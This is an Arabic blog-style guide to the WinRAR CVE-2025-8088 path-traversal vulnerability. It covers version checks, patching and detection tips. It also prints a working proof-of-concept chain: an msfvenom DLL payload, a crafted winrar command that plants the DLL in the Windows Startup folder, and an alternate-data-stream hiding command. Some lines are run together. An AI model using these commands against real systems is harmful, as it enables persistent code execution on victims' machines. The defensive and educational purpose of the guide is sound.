
شرح جذاب حول اكتشاف وتصحيح وتأمين ثغرة WinRAR CVE-2025-8088 بلمسة عملية للهاكرز.
WinRAR — الكلاسيكي المغبر الذي يمتلكه الجميع ولكن لا أحد يحدّثه — تمت معاقبته للتو بثغرة يوم صفر عالية الخطورة: CVE-2025-8088.
حتى CISA قامت بدفعها إلى كتالوج الثغرات المستغلة المعروفة الخاص بها، مع موعد نهائي للتصحيح في 2 سبتمبر 2025. هذا ليس مجرد نظري — بل نار حية.
..\Startup\evil.dllالمتأثر: WinRAR لنظام Windows (≤7.12)، UnRAR.dll، Portable UnRAR الآمن: إصدارات Linux، Unix، Android.
قبل أن تصاب بالذعر أو تلعب دور الهاكر، تحقق من إصدارك.
تعليمات ← حول WinRARwinget list WinRAR
(أو قم بتشغيل winrar.exe من دليل تثبيته)
UnRAR.dll ← خصائص ← تفاصيل.عندما بدأت كتابة هذا، كنت على الإصدار 7.10 — نعم، جاهز للاصطياد 🗿🐔🍗.
تعليمات ← حول WinRAR ← يجب أن يظهر 7.13 أو أحدث.UnRAR.dll في الأدوات التابعة، إن وجدت.WinRAR لا يقوم بالتحديث التلقائي — اضبط تذكيرًا في التقويم، لا تصبح هدفًا ثابتًا.
ملاحظة: تجاهل مرونة خلفية سطح المكتب هنا — كان عليّ أن أتباهى قليلاً! 😏
%TEMP% و Startup.⚠ تنويه: هذا لأغراض اختبار أمني تعليمي ومرخص فقط. لا تتحول إلى عفريت كامل 🗿.
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
type evil.dll > legit.txt:evil.dll
بوم — evil.dll ينتهي في Startup. عند إعادة التشغيل التالية؟ مرحبًا calc.exe.
التصحيح ← WinRAR 7.13+
ابحث عن ملفات .dll أو .lnk مشبوهة في:
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup%TEMP%راقب ADS:
streams.exe -s C:\
قاعدة IDS/IPS: قم بتمييز RAR الذي يحتوي على تسلسلات ..\.
إضافات Nessus/Qualys متاحة بالفعل.
لم تكن هذه ثغرة "ربما يومًا ما" — بل كانت مسلحة قبل الإفصاح عنها. إذا كنت لا تزال على الإصدار 7.10 (مثلي عندما كنت أكتب هذا)، قم بالتصحيح الآن. إذا كنت في الجانب الأحمر، اعتبر هذه دراسة حالة لكيفية تحول الأدوات القديمة إلى نواقل هجوم جديدة.